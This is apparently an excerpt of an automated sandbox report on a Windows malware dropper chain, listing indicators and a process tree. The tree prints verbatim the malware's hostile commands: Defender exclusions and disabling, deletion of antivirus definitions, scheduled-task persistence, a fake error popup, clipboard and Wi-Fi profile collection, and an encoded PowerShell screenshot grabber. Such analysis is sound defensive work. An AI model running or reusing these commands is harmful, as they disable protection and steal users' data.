5796 WMIC.exe Token: SeLoadDriverPrivilege 5796 WMIC.exe Token: SeSystemProfilePrivilege 5796 WMIC.exe Token: SeSystemtimePrivilege 5796 WMIC.exe Token: SeProfSingleProcessPrivilege 5796 WMIC.exe Token: SeIncBasePriorityPrivilege 5796 WMIC.exe Token: SeCreatePagefilePrivilege 5796 WMIC.exe Token: SeBackupPrivilege 5796 WMIC.exe Token: SeRestorePrivilege 5796 WMIC.exe Token: SeShutdownPrivilege 5796 WMIC.exe Token: SeDebugPrivilege 5796 WMIC.exe Token: SeSystemEnvironmentPrivilege 5796 WMIC.exe Token: SeRemoteShutdownPrivilege 5796 WMIC.exe Token: SeUndockPrivilege 5796 WMIC.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 5408 Ammyy.exe 5176 python-installer.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 5408 Ammyy.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3164 EXCEL.EXE 3164 EXCEL.EXE 3164 EXCEL.EXE 3164 EXCEL.EXE 3164 EXCEL.EXE 3164 EXCEL.EXE 4848 jrockekcurje.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4688 wrote to memory of 2672 4688 Synaptics.exe 86 PID 4688 wrote to memory of 2672 4688 Synaptics.exe 86 PID 4688 wrote to memory of 2672 4688 Synaptics.exe 86 PID 4688 wrote to memory of 4528 4688 Synaptics.exe 88 PID 4688 wrote to memory of 4528 4688 Synaptics.exe 88 PID 4688 wrote to memory of 4528 4688 Synaptics.exe 88 PID 4528 wrote to memory of 628 4528 Synaptics.exe 89 PID 4528 wrote to memory of 628 4528 Synaptics.exe 89 PID 4528 wrote to memory of 628 4528 Synaptics.exe 89 PID 628 wrote to memory of 1996 628 ._cache_Synaptics.exe 94 PID 628 wrote to memory of 1996 628 ._cache_Synaptics.exe 94 PID 628 wrote to memory of 3568 628 ._cache_Synaptics.exe 96 PID 628 wrote to memory of 3568 628 ._cache_Synaptics.exe 96 PID 628 wrote to memory of 3568 628 ._cache_Synaptics.exe 96 PID 3568 wrote to memory of 4384 3568 pornhub_downloader.exe 97 PID 3568 wrote to memory of 4384 3568 pornhub_downloader.exe 97 PID 4384 wrote to memory of 2844 4384 cmd.exe 100 PID 4384 wrote to memory of 2844 4384 cmd.exe 100 PID 2844 wrote to memory of 2316 2844 mshta.exe 101 PID 2844 wrote to memory of 2316 2844 mshta.exe 101 PID 2844 wrote to memory of 2316 2844 mshta.exe 101 PID 2316 wrote to memory of 5056 2316 PORNHU~1.EXE 102 PID 2316 wrote to memory of 5056 2316 PORNHU~1.EXE 102 PID 5056 wrote to memory of 3140 5056 cmd.exe 123 PID 5056 wrote to memory of 3140 5056 cmd.exe 123 PID 5056 wrote to memory of 2104 5056 cmd.exe 105 PID 5056 wrote to memory of 2104 5056 cmd.exe 105 PID 5056 wrote to memory of 836 5056 cmd.exe 106 PID 5056 wrote to memory of 836 5056 cmd.exe 106 PID 5056 wrote to memory of 3056 5056 cmd.exe 107 PID 5056 wrote to memory of 3056 5056 cmd.exe 107 PID 3056 wrote to memory of 3172 3056 cmd.exe 108 PID 3056 wrote to memory of 3172 3056 cmd.exe 108 PID 5056 wrote to memory of 1536 5056 cmd.exe 109 PID 5056 wrote to memory of 1536 5056 cmd.exe 109 PID 5056 wrote to memory of 2260 5056 cmd.exe 110 PID 5056 wrote to memory of 2260 5056 cmd.exe 110 PID 1536 wrote to memory of 4192 1536 msedge.exe 111 PID 1536 wrote to memory of 4192 1536 msedge.exe 111 PID 5056 wrote to memory of 448 5056 cmd.exe 112 PID 5056 wrote to memory of 448 5056 cmd.exe 112 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 PID 1536 wrote to memory of 536 1536 msedge.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2260 attrib.exe 6492 attrib.exe 6152 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\Synaptics.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"2⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Desktop Window Manager.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Desktop Window Manager.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6716
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Desktop Window Manager" /tr "C:\ProgramData\Desktop Window Manager.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:6584 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"3⤵
- Executes dropped EXE
PID:6004 -
C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:2624 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'"5⤵PID:1680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:5176
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""5⤵PID:5180
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4024
-
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"6⤵PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:5188
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5496
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵PID:5896
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵PID:3172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵PID:5760
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵PID:3808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5436
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:6044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:5316
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:3028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵PID:6056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:6044
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:5528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:5888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5896
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:5804
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:5344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:3024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:6648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:5180
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:6832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3808
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6156 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:6184
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:6852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"5⤵PID:6228
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath6⤵PID:6860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:6300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
PID:6844 -
